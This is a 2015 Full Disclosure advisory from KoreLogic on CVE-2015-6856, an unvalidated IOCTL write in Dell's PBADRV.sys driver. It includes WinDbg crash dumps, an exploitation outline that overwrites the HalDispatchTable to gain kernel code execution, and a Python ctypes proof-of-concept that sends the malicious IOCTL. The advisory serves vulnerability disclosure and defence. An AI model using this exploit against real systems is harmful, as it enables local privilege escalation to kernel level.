lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <5674807E.3030505@korelogic.com>
Date: Fri, 18 Dec 2015 15:54:06 -0600
From: KoreLogic Disclosures <disclosures@...elogic.com>
To: fulldisclosure@...lists.org, bugtraq@...urityfocus.com
Subject: [FD] KL-001-2015-008 : Dell Pre-Boot Authentication Driver
 Uncontrolled Write to Arbitrary Address

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

KL-001-2015-008 : Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address

Title: Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address
Advisory ID: KL-001-2015-008
Publication Date: 2015.12.18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-008.txt


1. Vulnerability Details

     Affected Vendor: Dell
     Affected Product: Pre-Boot Authentication Driver
     Affected Version: 1.0.1.5
     Platform: Microsoft Windows XP SP3, Microsoft Windows 2003 SP2,
     Microsoft Windows 7
     CWE Classification: CWE-20: Improper input validation
     Impact: Arbitrary Code Execution
     Attack vector: IOCTL
     CVE-ID: CVE-2015-6856

2. Vulnerability Description

   The Dell Pre-Boot Authentication Driver (PBADRV.sys) contains
   a vulnerability that can be leveraged to enable an attacker to
   write arbitrary code. The 'OutputAddress' from the IOCTL call is
   not validated before it attempts to write to memory. The content
   of the write is a four-byte hex value that is always greater
   than that of the kernel base address. Using multiple writes, it
   may be possible to overwrite the first entry of HalDispatchTable
   in a way that the entry would point to a user-land address. An
   attacker need only allocate shellcode at said address and call
   the ntdll!NtQueryIntervalProfile() function.

3. Technical Description

     Example against Windows XP:

    Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
    Copyright (c) Microsoft Corporation. All rights reserved.


    Loading Dump File [C:\WINXP\MEMORY.DMP]
    Kernel Complete Dump File: Full address space is available

    Symbol search path is: srv*
    Executable search path is:
    Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
    Product: WinNt, suite: TerminalServer SingleUserTS
    Built by: 2600.xpsp_sp3_qfe.101209-1646
    Machine Name:
    Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
    Debug session time: Tue Feb  3 05:41:17.712 2015 (UTC - 8:00)
    System Uptime: 0 days 0:03:46.296
    Loading Kernel Symbols
    ....

    kd> !analyze -v

    READ_ADDRESS:  909090d4
    FAULTING_IP:
    +2902faf00efdfc0
    00000008 8b4044          mov     eax,dword ptr [eax+44h]

    MM_INTERNAL_CODE:  0
    DEFAULT_BUCKET_ID:  DRIVER_FAULT
    BUGCHECK_STR:  0x50
    PROCESS_NAME:  pythonw.exe

    TRAP_FRAME:  b24bdc8c -- (.trap 0xffffffffb24bdc8c)
    ErrCode = 00000000
    eax=90909090 ebx=8060ea01 ecx=00000000 edx=0021f7f0 esi=012c1be8 edi=b24bdd64
    eip=00000008 esp=b24bdd00 ebp=b24bdd20 iopl=0         nv up ei ng nz na pe nc
    cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
    00000008 8b4044          mov     eax,dword ptr [eax+44h] ds:0023:909090d4=????????

    Resetting default scope
    LAST_CONTROL_TRANSFER:  from 8051cc7f to 804f8cc5

    STACK_TEXT:
    b24bdc14 8051cc7f 00000050 909090d4 00000000 nt!KeBugCheckEx+0x1b
    b24bdc74 805405d4 00000000 909090d4 00000000 nt!MmAccessFault+0x8e7
    b24bdc74 00000008 00000000 909090d4 00000000 nt!KiTrap0E+0xcc
    WARNING: Frame IP not in any known module. Following frames may be wrong.
    b24bdcfc 8063d5cd 00000001 0000000c b24bdd14 0x8
    b24bdd20 8060eb43 00000002 b24bdd64 0021f7f8 nt!KeQueryIntervalProfile+0x37
    b24bdd54 8053d6d8 00000002 012c1be8 0021f7fc nt!NtQueryIntervalProfile+0x61
    b24bdd54 7c90e514 00000002 012c1be8 0021f7fc nt!KiFastCallEntry+0xf8
    0021f7e4 7c90d84a 1d1add9a 00000002 012c1be8 ntdll!KiFastSystemCallRet
    0021f7e8 1d1add9a 00000002 012c1be8 0021f89c ntdll!NtQueryIntervalProfile+0xc
    0021f7fc 1d1acab6 1d1ac900 0021f81c 00000008 _ctypes!DllCanUnloadNow+0x5b6a
    0021f82c 1d1a8db8 7c90d83e 0021f920 24f7d09f _ctypes!DllCanUnloadNow+0x4886
    0021f8dc 1d1a959e 00001100 7c90d83e 0021f910 _ctypes!DllCanUnloadNow+0xb88
    0021f984 1d1a54d8 7c90d83e 012d4300 00000000 _ctypes!DllCanUnloadNow+0x136e
    0021f9dc 1e07cf0c 00000000 012d4300 00000000 _ctypes+0x54d8
    00000000 00000000 5044408b 000004bb 88808b00 python27!PyObject_Call+0x4c

    STACK_COMMAND:  kb
    FOLLOWUP_IP:
    nt!KiTrap0E+cc
    805405d4 85c0            test    eax,eax

    SYMBOL_STACK_INDEX:  2
    SYMBOL_NAME:  nt!KiTrap0E+cc
    FOLLOWUP_NAME:  MachineOwner
    MODULE_NAME: nt
    IMAGE_NAME:  ntkrnlpa.exe
    DEBUG_FLR_IMAGE_TIMESTAMP:  4d00d4fb
    FAILURE_BUCKET_ID:  0x50_nt!KiTrap0E+cc
    BUCKET_ID:  0x50_nt!KiTrap0E+cc
    Followup: MachineOwner
    ---------


     Example against Windows 7:

    Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86
    Copyright (c) Microsoft Corporation. All rights reserved.

    Loading Dump File [C:\Users\dev\Desktop\Mini091715-01.dmp]
    Mini Kernel Dump File: Only registers and stack trace are available

    Symbol search path is: *** Invalid ***
    ****************************************************************************
    * Symbol loading may be unreliable without a symbol search path.           *
    * Use .symfix to have the debugger choose a symbol path.                   *
    * After setting your symbol path, use .reload to refresh symbol locations. *
    ****************************************************************************
    Executable search path is:
    *********************************************************************
    * Symbols can not be loaded because symbol path is not initialized. *
    *                                                                   *
    * The Symbol Path can be set by:                                    *
    *   using the _NT_SYMBOL_PATH environment variable.                 *
    *   using the -y <symbol_path> argument when starting the debugger. *
    *   using .sympath and .sympath+                                    *
    *********************************************************************
    Unable to load image \WINDOWS\system32\ntkrnlpa.exe, Win32 error 0n2
    *** WARNING: Unable to verify timestamp for ntkrnlpa.exe
    *** ERROR: Module load completed but symbols could not be loaded for ntkrnlpa.exe
    Windows Server 2003 Kernel Version 3790 (Service Pack 2) UP Free x86 compatible
    Product: Server, suite: Enterprise TerminalServer SingleUserTS
    Machine Name:
    Kernel base = 0x80800000 PsLoadedModuleList = 0x808a1fe8
    Debug session time: Thu Sep 17 08:21:15.962 2015 (UTC - 7:00)
    System Uptime: 0 days 0:10:19.785
    *********************************************************************
    * Symbols can not be loaded because symbol path is not initialized. *
    *                                                                   *
    * The Symbol Path can be set by:                                    *
    *   using the _NT_SYMBOL_PATH environment variable.                 *
    *   using the -y <symbol_path> argument when starting the debugger. *
    *   using .sympath and .sympath+                                    *
    *********************************************************************
    Unable to load image \WINDOWS\system32\ntkrnlpa.exe, Win32 error 0n2
    *** WARNING: Unable to verify timestamp for ntkrnlpa.exe
    *** ERROR: Module load completed but symbols could not be loaded for ntkrnlpa.exe
    Loading Kernel Symbols
    ...............................................................
    ............................................................
    Loading User Symbols
    Loading unloaded module list
    ..
    *******************************************************************************
    *                                                                             *
    *                        Bugcheck Analysis                                    *
    *                                                                             *
    *******************************************************************************

    Use !analyze -v to get detailed debugging information.
    BugCheck 50, {ffffffff, 1, 80820de3, 0}
    ***** Kernel symbols are WRONG. Please fix symbols to do analysis.

    *************************************************************************
    *** WARNING: Unable to verify timestamp for hal.dll
    *** ERROR: Module load completed but symbols could not be loaded for hal.dll
    *** WARNING: Unable to verify timestamp for PBADRV.sys
    *** ERROR: Module load completed but symbols could not be loaded for PBADRV.sys
    *** WARNING: Unable to verify timestamp for srv.sys
    *** ERROR: Module load completed but symbols could not be loaded for srv.sys
    *************************************************************************
    Probably caused by : PBADRV.sys ( PBADRV+13a0 )

    Followup: MachineOwner
    ---------

    kd> .symfix;.reload
    Loading Kernel Symbols
    ...............................................................
    ............................................................
    Loading User Symbols
    Loading unloaded module list
    ..
    kd> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Bugcheck Analysis                                    *
    *                                                                             *
    *******************************************************************************

    PAGE_FAULT_IN_NONPAGED_AREA (50)
    Invalid system memory was referenced.  This cannot be protected by try-except,
    it must be protected by a Probe.  Typically the address is just plain bad or it
    is pointing at freed memory.
    Arguments:
    Arg1: ffffffff, memory referenced.
    Arg2: 00000001, value 0 = read operation, 1 = write operation.
    Arg3: 80820de3, If non-zero, the instruction address which referenced the bad memory
    	address.
    Arg4: 00000000, (reserved)

    Debugging Details:
    ------------------


    Could not read faulting driver name
    Unable to load image \??\C:\Documents and Settings\Administrator\Desktop\PBADRV.sys, Win32 error 0n2
    *** WARNING: Unable to verify timestamp for PBADRV.sys
    *** ERROR: Module load completed but symbols could not be loaded for PBADRV.sys

    WRITE_ADDRESS: GetPointerFromAddress: unable to read from 808a1df0
    GetPointerFromAddress: unable to read from 808a1de8
    GetUlongFromAddress: unable to read from 808a67f8
     ffffffff

    FAULTING_IP:
    nt!IopCompleteRequest+97
    80820de3 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
    MM_INTERNAL_CODE:  0
    CUSTOMER_CRASH_COUNT:  1
    DEFAULT_BUCKET_ID:  DRIVER_FAULT
    BUGCHECK_STR:  0x50
    PROCESS_NAME:  python.exe
    CURRENT_IRQL:  1
    ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre
    IRP_ADDRESS: 87c57378
    TRAP_FRAME:  ba456a6c -- (.trap 0xffffffffba456a6c)
    ErrCode = 00000002
    eax=00000004 ebx=87c57378 ecx=00000001 edx=00000000 esi=88064e50 edi=ffffffff
    eip=80820de3 esp=ba456ae0 ebp=ba456b24 iopl=0         nv up ei pl nz na po nc
    cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
    nt!IopCompleteRequest+0x97:
    80820de3 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
    Resetting default scope

    LAST_CONTROL_TRANSFER:  from 8085b93b to 80827109

    STACK_TEXT:
    ba4569e0 8085b93b 00000050 ffffffff 00000001 nt!KeBugCheckEx+0x1b
    ba456a54 808885d8 00000001 ffffffff 00000000 nt!MmAccessFault+0xa91
    ba456a54 80820de3 00000001 ffffffff 00000000 nt!KiTrap0E+0xd8
    ba456b24 8082cd9a 87c573b8 ba456b70 ba456b64 nt!IopCompleteRequest+0x97
    ba456b74 80a59f1f 00000000 00000000 00000000 nt!KiDeliverApc+0xb8
    ba456b94 80a5a153 ba456b01 00000000 87c573b8 hal!HalpDispatchSoftwareInterrupt+0x49
    ba456bb0 80a5a1d0 00000001 ba456b00 ba456bd0 hal!HalpCheckForSoftwareInterrupt+0x81
    ba456bc0 8082f793 00000000 ba456b00 ba456bf0 hal!KfLowerIrql+0x62
    ba456bd0 80829939 87c573b8 87c57378 00000000 nt!KiExitDispatcher+0xd3
    ba456bf0 8081daa5 87c573b8 87a0cb68 00000000 nt!KeInsertQueueApc+0x57
    ba456c24 ba5423a0 87c57378 87cbb490 87c57378 nt!IopfCompleteRequest+0x201
    WARNING: Stack unwind information not available. Following frames may be wrong.
    ba456c3c 8081d7d3 87d13c88 87c57378 87a0cb68 PBADRV+0x13a0
    ba456c50 808ef85d 87c573e8 87a0cb68 87c57378 nt!IofCallDriver+0x45
    ba456c64 808f05ff 87d13c88 87c57378 87a0cb68 nt!IopSynchronousServiceTail+0x10b
    ba456d00 808e912e 00000788 00000000 00000000 nt!IopXxxControlFile+0x5e5
    ba456d34 80885614 00000788 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
    ba456d34 7c82845c 00000788 00000000 00000000 nt!KiSystemServicePostCall
    0021fa8c 00000000 00000000 00000000 00000000 0x7c82845c


    STACK_COMMAND:  kb

    FOLLOWUP_IP:
    PBADRV+13a0
    ba5423a0 ??              ???

    SYMBOL_STACK_INDEX:  b
    SYMBOL_NAME:  PBADRV+13a0
    FOLLOWUP_NAME:  MachineOwner
    MODULE_NAME: PBADRV
    IMAGE_NAME:  PBADRV.sys
    DEBUG_FLR_IMAGE_TIMESTAMP:  478274de
    FAILURE_BUCKET_ID:  0x50_PBADRV+13a0
    BUCKET_ID:  0x50_PBADRV+13a0
    ANALYSIS_SOURCE:  KM
    FAILURE_ID_HASH_STRING:  km:0x50_pbadrv+13a0
    FAILURE_ID_HASH:  {7469b31a-ad45-6d57-5589-106dc943201e}
    Followup: MachineOwner
    ---------


4. Mitigation and Remediation Recommendation

     The vendor no longer supports this version, and no known
     remediation is available.

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2015.02.18 - KoreLogic sends vulnerability report and PoC to Dell.
     2015.02.19 - Dell acknowledges receipt of vulnerability report.
     2015.04.06 - KoreLogic contacts Dell for a progress update and directs
                  Dell to KoreLogic's 45 business day disclosure timeline.
     2015.04.07 - Dell requests additional time to develop remediation.
     2015.04.07 - KoreLogic asks for an estimate of the timeline for
                  remediation.
     2015.04.09 - Dell responds to say they are unable to provide an estimate
                  for the length of time to develop a mitigation or
                  remediation strategy.
     2015.04.27 - 45 business days have elapsed since the vulnerability was
                  reported to Dell.
     2015.07.01 - 90 business days have elapsed since the vulnerability was
                  reported to Dell.
     2015.08.13 - 120 business days have elapsed since the vulnerability was
                  reported to Dell.
     2015.09.10 - KoreLogic requests a CVE from Mitre.
     2015.09.10 - Mitre issues CVE-2015-6856.
     2015.09.11 - KoreLogic requests update from Dell.
     2015.09.18 - Dell responds to say they are unable to provide an estimate
                  for the length of time to develop a mitigation or
                  remediation strategy.
     2015.09.30 - 150 business days have elapsed since the vulnerability was
                  reported to Dell.
     2015.11.04 - KoreLogic notifies Dell the issue will be disclosed publicly
                  in 10 business days.
     2015.11.04 - Dell states they are working on a remediation and asks
                  KoreLogic to continue to hold back public release.
     2015.11.13 - 180 business days have elapsed since the vulnerability was
                  reported to Dell.
     2015.12.03 - Dell responds with the following statement: "The referenced
                  software component is from an old version of Dell Data
                  Protection | Authentication that has not been shipped for
                  some time and is no longer supported. No software updates
                  are planned at this time."
     2015.12.18 - Public disclosure.

7. Proof of Concept

########################################################################
#
# Copyright 2015 KoreLogic Inc., All Rights Reserved.
#
# This proof of concept, having been partly or wholly developed
# and/or sponsored by KoreLogic, Inc., is hereby released under
# the terms and conditions set forth in the Creative Commons
# Attribution Share-Alike 4.0 (United States) License:
#
#   http://creativecommons.org/licenses/by-sa/4.0/
#
#
# Author: Matt Bergin (KoreLogic / Smash the Stack)
#
# Purpose: Dell PBADRV.sys Privilege Escalation PoC XP SP3
#
########################################################################


from ctypes import byref, c_int, c_ulong, windll
from sys import exit

CreateFileA, NtAllocateVirtualMemory = windll.kernel32.CreateFileA, windll.ntdll.NtAllocateVirtualMemory
WriteProcessMemory, DeviceIoControlFile = windll.kernel32.WriteProcessMemory, windll.ntdll.ZwDeviceIoControlFile
CloseHandle = windll.kernel32.CloseHandle
FILE_SHARE_READ, FILE_SHARE_WRITE, OPEN_EXISTING, NULL = 2, 1, 3, 0

handle = CreateFileA("\\\\.\\PBADRV", FILE_SHARE_WRITE | FILE_SHARE_READ, 0, None, OPEN_EXISTING, 0, None)
NtAllocateVirtualMemory(-1, byref(c_int(0x1)), 0x0, byref(c_int(0xffff)), 0x1000 | 0x2000, 0x40)
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
DeviceIoControlFile(handle, NULL, NULL, NULL, byref(c_ulong(8)), 0x0022201c, 0x1, 0x258, 0x90909090, 0)

# Fail
CloseHandle(handle)
exit(0)

The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBCAAGBQJWdIB7AAoJEE1lmiwOGYkME7cH/13T9fnDcVjynm4OkHpd1BiN
9xvNtLruxQN12OLJrPKuH/ccp1L33J5YWacPbRt1rffSEFvntv7nD/dIHQFNSvAT
aFrEcjJ0hcj25Xd44IeG9QwP8QB2a4yAG1YLChlUOQwF9KJym1o7RBsAogeCLS+x
heq2hvOOTB+frxfFQX4M1C5Hl/vVdaVELmn6DuvmKqOQbKWoQDPufeUAZIMgDw4b
x3CtCY+WCI8KqhVo5EgA4anwJOKbQ0RSpWbN2KYnHALYuA9ndz5yNknzY82Wbydb
TCDflsijwfdq7kdlIA8HNp/y5Ekfv+G8NtbmugeZ0i4epI8eUZUfjSmSeKn2+rI=
=JAVc
-----END PGP SIGNATURE-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ